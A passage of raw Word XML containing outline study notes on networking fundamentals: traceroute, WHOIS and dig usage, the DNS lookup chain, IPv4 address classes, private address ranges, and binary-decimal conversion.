    <w:p w14:paraId="35F3B679" w14:textId="7D36AA62" w:rsidR="00C35ECE" w:rsidRPr="0084205E" w:rsidRDefault="00C35ECE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Runs on Internet Layer of TCP/IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37810281" w14:textId="3945A402" w:rsidR="005F4D72" w:rsidRPr="0084205E" w:rsidRDefault="005F4D72" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Traceroute &lt;destination&gt; - UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A66507B" w14:textId="04CD59C8" w:rsidR="005F4D72" w:rsidRPr="0084205E" w:rsidRDefault="005F4D72" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Windows tracert – ICMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD6E650" w14:textId="2A8A3CE4" w:rsidR="005F4D72" w:rsidRPr="0084205E" w:rsidRDefault="005F4D72" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Can be altered via switch input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144EC834" w14:textId="44A0F1B8" w:rsidR="005F4D72" w:rsidRPr="0084205E" w:rsidRDefault="005F4D72" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Switch -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – specify </w:t>
      </w:r>
      <w:r w:rsidR="00C35ECE" w:rsidRPr="0084205E">
        <w:t>interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D65FA81" w14:textId="35337208" w:rsidR="00C35ECE" w:rsidRPr="0084205E" w:rsidRDefault="00C35ECE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Switch -T – TCP requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AA5D46" w14:textId="539F9C88" w:rsidR="00C35ECE" w:rsidRPr="0084205E" w:rsidRDefault="00C35ECE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>WHOIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D44F209" w14:textId="307E3F0E" w:rsidR="00C35ECE" w:rsidRPr="0084205E" w:rsidRDefault="00C35ECE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Domain names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7645DC37" w14:textId="4B504495" w:rsidR="004D7087" w:rsidRPr="0084205E" w:rsidRDefault="004D7087" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Query who a domain name is registered to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6163DD8C" w14:textId="6C172456" w:rsidR="004D7087" w:rsidRPr="0084205E" w:rsidRDefault="004D7087" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;domain&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED9EA2E" w14:textId="7B79E8DC" w:rsidR="004D7087" w:rsidRPr="0084205E" w:rsidRDefault="004D7087" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Dig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE72DD8" w14:textId="75549E04" w:rsidR="004D7087" w:rsidRPr="0084205E" w:rsidRDefault="00B31BEB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>When requesting a website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3734A22F" w14:textId="2FEBD163" w:rsidR="00B31BEB" w:rsidRPr="0084205E" w:rsidRDefault="00B31BEB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Computer checks local cache for preexisting IP stored for website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CCA008" w14:textId="0EFAF3E8" w:rsidR="00B31BEB" w:rsidRPr="0084205E" w:rsidRDefault="00B31BEB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sends request to recursive DNS server (known by router)</w:t>
      </w:r>
      <w:r w:rsidR="001A227A" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – FIRST STOP outside of local cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CEE89F" w14:textId="4293959C" w:rsidR="00B31BEB" w:rsidRPr="0084205E" w:rsidRDefault="00B31BEB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Contains cache of popular domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DF6075" w14:textId="0F98CDDD" w:rsidR="00B31BEB" w:rsidRPr="0084205E" w:rsidRDefault="00B31BEB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>If not in recursive server cache, forwarded to Root Name Server (13 of them worldwide)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741E6210" w14:textId="78BD9811" w:rsidR="00B31BEB" w:rsidRPr="0084205E" w:rsidRDefault="00B31BEB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Track TLD (top-level domain) servers to forward request to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7FCC79" w14:textId="79A4E2AB" w:rsidR="00B31BEB" w:rsidRPr="0084205E" w:rsidRDefault="00B31BEB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Split into extensions (.com, .org, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4598A232" w14:textId="642C6B52" w:rsidR="00B31BEB" w:rsidRPr="0084205E" w:rsidRDefault="00B31BEB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>TLDs keep track of Authoritative Name Servers (next level down)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171E1A4F" w14:textId="1884DFF4" w:rsidR="00B31BEB" w:rsidRPr="0084205E" w:rsidRDefault="00B31BEB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ANS servers store DNS records for domains directly, with relevant ANS sending DNS info back to request source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C905CEC" w14:textId="50BF28B5" w:rsidR="00B31BEB" w:rsidRPr="0084205E" w:rsidRDefault="00B31BEB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>All of this can be done manually with “dig”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5089954C" w14:textId="5E061632" w:rsidR="00B31BEB" w:rsidRPr="0084205E" w:rsidRDefault="00B31BEB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Allows manual query of recursive DNS servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8E69B6" w14:textId="4C6BD05D" w:rsidR="00B31BEB" w:rsidRPr="0084205E" w:rsidRDefault="00B31BEB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Syntax: dig &lt;domain&gt; @</w:t>
      </w:r>
      <w:r w:rsidR="001A227A" w:rsidRPr="0084205E">
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t>dns-server-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F256BC1" w14:textId="13657CBD" w:rsidR="001A227A" w:rsidRPr="0084205E" w:rsidRDefault="001A227A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Google public DNS server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376F1FC6" w14:textId="6CADA240" w:rsidR="001A227A" w:rsidRPr="0084205E" w:rsidRDefault="001A227A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C365CFF" w14:textId="6FDC6038" w:rsidR="001A227A" w:rsidRPr="0084205E" w:rsidRDefault="001A227A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>8.8.4.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0603BEF8" w14:textId="7B0E02E0" w:rsidR="001A227A" w:rsidRPr="0084205E" w:rsidRDefault="001A227A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Helpful for network troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639134DF" w14:textId="7891359F" w:rsidR="001A227A" w:rsidRPr="0084205E" w:rsidRDefault="001A227A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Gives TTL of queried DNS record (found in second column)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C30A06" w14:textId="1FBAEBF5" w:rsidR="001A227A" w:rsidRPr="0084205E" w:rsidRDefault="001A227A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Measured in seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FAD398" w14:textId="48597CC4" w:rsidR="002C16B0" w:rsidRPr="0084205E" w:rsidRDefault="002C16B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>IPv4 Addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C144139" w14:textId="67336C16" w:rsidR="002C16B0" w:rsidRPr="0084205E" w:rsidRDefault="002C16B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>IP Address Classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD97262" w14:textId="68F23F25" w:rsidR="002C16B0" w:rsidRPr="0084205E" w:rsidRDefault="002C16B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Class A – 1-127</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306D55D8" w14:textId="7D9A2835" w:rsidR="002C16B0" w:rsidRPr="0084205E" w:rsidRDefault="002C16B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Class B – 128-191</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0562AE" w14:textId="4638E12E" w:rsidR="002C16B0" w:rsidRPr="0084205E" w:rsidRDefault="002C16B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Class C – 192-223</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F238E96" w14:textId="3A6ADB9D" w:rsidR="002C16B0" w:rsidRPr="0084205E" w:rsidRDefault="002C16B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Class D – 224-239</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3077FB44" w14:textId="1037B516" w:rsidR="002C16B0" w:rsidRPr="0084205E" w:rsidRDefault="002C16B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Class E – 240-255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442ABB26" w14:textId="5B9B092C" w:rsidR="002C16B0" w:rsidRPr="0084205E" w:rsidRDefault="002C16B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>used for research</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F72ACA" w14:textId="55B353CA" w:rsidR="002C16B0" w:rsidRPr="0084205E" w:rsidRDefault="002C16B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Private Address Space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA23FDA" w14:textId="65BBB16D" w:rsidR="002C16B0" w:rsidRPr="0084205E" w:rsidRDefault="002C16B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Class A – 10.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9297A2" w14:textId="57D7405E" w:rsidR="002C16B0" w:rsidRPr="0084205E" w:rsidRDefault="002C16B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>used by businesses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2398666B" w14:textId="48955673" w:rsidR="002C16B0" w:rsidRPr="0084205E" w:rsidRDefault="002C16B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Class B – 172.16.0.0 to 172.31.255.255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242266F3" w14:textId="77CD39F3" w:rsidR="002C16B0" w:rsidRPr="0084205E" w:rsidRDefault="002C16B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Class C 0 192.168.0.0 to 192.168.255.255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17351D62" w14:textId="7019E435" w:rsidR="002C16B0" w:rsidRPr="0084205E" w:rsidRDefault="002C16B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>192.168.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C54C5E8" w14:textId="38B7346B" w:rsidR="002C16B0" w:rsidRPr="0084205E" w:rsidRDefault="002C16B0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>192.168.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6762BE51" w14:textId="166D4423" w:rsidR="002C16B0" w:rsidRPr="0084205E" w:rsidRDefault="00045AB5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>256 addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DBA344" w14:textId="756E2F39" w:rsidR="00045AB5" w:rsidRPr="0084205E" w:rsidRDefault="00045AB5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">first address is network </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1EF034EE" w14:textId="31DBE694" w:rsidR="00045AB5" w:rsidRPr="0084205E" w:rsidRDefault="00045AB5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">last address is broadcast </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25001BD0" w14:textId="0E428FF7" w:rsidR="002C16B0" w:rsidRPr="0084205E" w:rsidRDefault="00045AB5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>gateway address is also usually reserved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A99A244" w14:textId="113C3917" w:rsidR="00045AB5" w:rsidRPr="0084205E" w:rsidRDefault="00045AB5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">0.0.0.0 – reserved for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>unroutable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E66E52C" w14:textId="28DAC291" w:rsidR="00045AB5" w:rsidRPr="0084205E" w:rsidRDefault="00045AB5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Binary </w:t>
      </w:r>
      <w:r w:rsidR="00611526" w:rsidRPr="0084205E">
        <w:t>to Decimal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FA0DA6" w14:textId="35F13DF7" w:rsidR="00045AB5" w:rsidRPr="0084205E" w:rsidRDefault="00045AB5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>IPv4 – 32 bits split up into four sections of eight bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66802ADB" w14:textId="180C595E" w:rsidR="00611526" w:rsidRPr="0084205E" w:rsidRDefault="00611526" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Decimal to Binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCD20E0" w14:textId="6E97D852" w:rsidR="00611526" w:rsidRPr="0084205E" w:rsidRDefault="00611526" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
